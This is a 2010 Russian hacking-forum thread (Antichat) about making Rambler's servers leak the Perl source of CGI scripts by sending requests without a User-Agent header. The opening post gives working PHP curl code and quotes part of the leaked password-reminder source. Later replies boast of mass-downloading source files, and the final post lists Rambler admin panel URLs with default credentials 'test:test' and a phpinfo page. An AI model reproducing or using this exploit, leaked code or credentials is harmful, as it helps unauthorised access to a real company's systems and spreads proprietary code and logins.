Форум АНТИЧАТ - Некоторые исходники Рамблера.

Некоторые исходники Рамблера.

19.02.2010, 19:37

~~m0Hze~~

Banned

Регистрация: 01.11.2008

Сообщения: 357

Провел на форуме:
2 месяца 2 недели 5 дней

Репутация: 141 ±

Некоторые исходники Рамблера.

Совсем нечаянно наткнулся сегодня днем,выкладываю сюда в виде мини статьи.
Запускаем тот скрипт,и смотрим на вывод.

PHP код:


		
			
<?php

$exec = curl_init('http://id.rambler.ru/script/reminder.cgi');

curl_setopt($exec, CURLOPT_RETURNTRANSFER, 0);

curl_setopt($exec, CURLOPT_REFERER, 'http://id-planet.rambler.ru/default/');

curl_setopt($exec, CURLOPT_HEADER, 1);

$page = curl_exec($exec);

echo $page;

?>

Запустив скрипт, я был очень удивлен увиденному, а увидел я следующее(приведен лишь отрывок полного кода):

Код:

#!/usr/bin/perl -w # Password reminder for mail.rambler.ru project # Original version by maniac@rambler-co.ru # Rewritten by Maxim Dounin, mdounin@rambler-co.ru # $Id: reminder.cgi,v 1.35 2009/04/02 18:51:47 citrin Exp $ ##################################################  #############################
use strict;
use warnings;
use utf8;
use CGI qw/ param /;
use Digest::MD5 qw/ md5_hex /;
use Time::HiRes;
use Rambler::CaptchaManager;
use rutils; use r_icq;
use rcfg;
my $H = { myname => 'reminder.cgi', DEBUG => 0, LOG => $rcfg::logdir.'/reminder/reminder_log', # template, used by rutils::print_tmpl TMPL_ROOT => $rcfg::tmpldir, TMPL => 'reminder.tmpl', SKIN => 'id', SKIN_OPT => { DEFAULT => $rcfg::urls{id}, LOGOUT => 'http://www.rambler.ru/', AUTH => $rcfg::urls{id}.'script/auth.cgi', }, # interface charset CHARSET => 'windows-1251', # ratelimits RATE_LOGIN => { rate => 1/3600, burst => 5 }, RATE_IP => { rate => 1/3600, burst => 10 }, RATE_IP_ROBOT => { rate => 1/60, burst => 50 }....

Собственно после несложного мыслительного процесса, я пришел к выводу, что передо мной исходники страницы Восстановление паролей.

А причина то, смешная!

После небольшого танца вокруг Рамблера, было выявлено еще как минимум 5 скриптов, которые можно скачать таким образом, и мне захотелось узнать с чем это связано.Первой мыслью было, что умер интерпретатор Perl, но из браузера я видел вполне нормальный результат работы скрипта, а не его исходник, значит этот вариант отпадает.Посмотрев заголовки отправляемые браузером сервера Рамблера, были поставлены опыты, и выявлено, что Рамблер показывает исходники некоторых скриптов, если к ним обратиться без заголовка User-Agent: ****.
То есть, вот такое обращение к скрипту:

PHP код:


		
			
<?php

$header = array('User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8');

$exec = curl_init('http://id.rambler.ru/script/reminder.cgi');

curl_setopt($exec, CURLOPT_RETURNTRANSFER, 0);

curl_setopt($exec, CURLOPT_REFERER, 'http://id-planet.rambler.ru/default/');

curl_setopt($exec, CURLOPT_HEADER, 1);

curl_setopt($exec,CURLOPT_HTTPHEADER, $header);

$page = curl_exec($exec);

echo $page;

?>

вполне нормальное.Увидим результат работы скрипта.Спасебо досвидания.Я отмечать праздники.
Full version статьи!
Всех с наступающим праздником!

19.02.2010, 20:20

~~XXI~~

Banned

Регистрация: 18.02.2010

Сообщения: 20

Провел на форуме:
9 часов 51 минуту 49 секунд

Репутация: 0 ±

Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )

Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )

19.02.2010, 20:24

Mr.Replica

Участник форума

Регистрация: 18.05.2010

Сообщения: 218

Провел на форуме:
1 месяц 4 дня

Репутация: 6 ±

сэнкс чувак...

19.02.2010, 20:31

-Hormold-

Кто, если не ты?

Регистрация: 29.09.2007

Сообщения: 616

Провел на форуме:
1 месяц 1 неделю

Репутация: 54 ±

Отправить сообщение для -Hormold- с помощью ICQ

Супер! Действительно работает! Если капнуть, то можно скачать около десятка файлов.
Epic fail...

19.02.2010, 20:33

~~m0Hze~~

Banned

Регистрация: 01.11.2008

Сообщения: 357

Провел на форуме:
2 месяца 2 недели 5 дней

Репутация: 141 ±

Цитата:

Сообщение от XXI

Это походу будет работать на всех сайтах с интерпретатором perl

ЗЫ смешно )

Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )

Fail.

19.02.2010, 21:14

shell_c0de

Hack All World

Регистрация: 07.07.2009

Сообщения: 361

Провел на форуме:
2 недели 6 дней

Репутация: 43 ±

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

В рамблере остались хоть норм кодеры ? =\
в прошлом году тоже сорцы были в паблике

19.02.2010, 21:16

~~XXI~~

Banned

Регистрация: 18.02.2010

Сообщения: 20

Провел на форуме:
9 часов 51 минуту 49 секунд

Репутация: 0 ±

Ухах. Скоро рамблеров появится докуя

Я уже 40 исходников скатал )

19.02.2010, 21:20

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщения: 976

Провел на форуме:
5 месяцев 5 дней

Репутация: 96 ±

Отправить сообщение для wildshaman с помощью ICQ

Цитата:

Сообщение от XXI

Ухах. Скоро рамблеров появится докуя

Я уже 40 исходников скатал )

Где ты там 40 штук-то нашел?)

19.02.2010, 21:23

TR0J@N

Участник форума

Регистрация: 30.03.2007

Сообщения: 134

Провел на форуме:
2 недели 3 дня

Репутация: 4 ±

Отправить сообщение для TR0J@N с помощью ICQ

Цитата:

Сообщение от wildshaman

Где ты там 40 штук-то нашел?)

Он наверное один и тотже качает) (востановление паса из статьи)

#10

19.02.2010, 21:29

shell_c0de

Hack All World

Регистрация: 07.07.2009

Сообщения: 361

Провел на форуме:
2 недели 6 дней

Репутация: 43 ±

http://in.fo2.rambler.ru/administrator/ Joomla =)
http://ad.rambler.ru/adm/client/ban.adm?cmd=list&item=bn test:test
http://ad.rambler.ru/adm/admin.adm test:test
http://fo2.rambler.ru/info.php phpinfo
Решето ))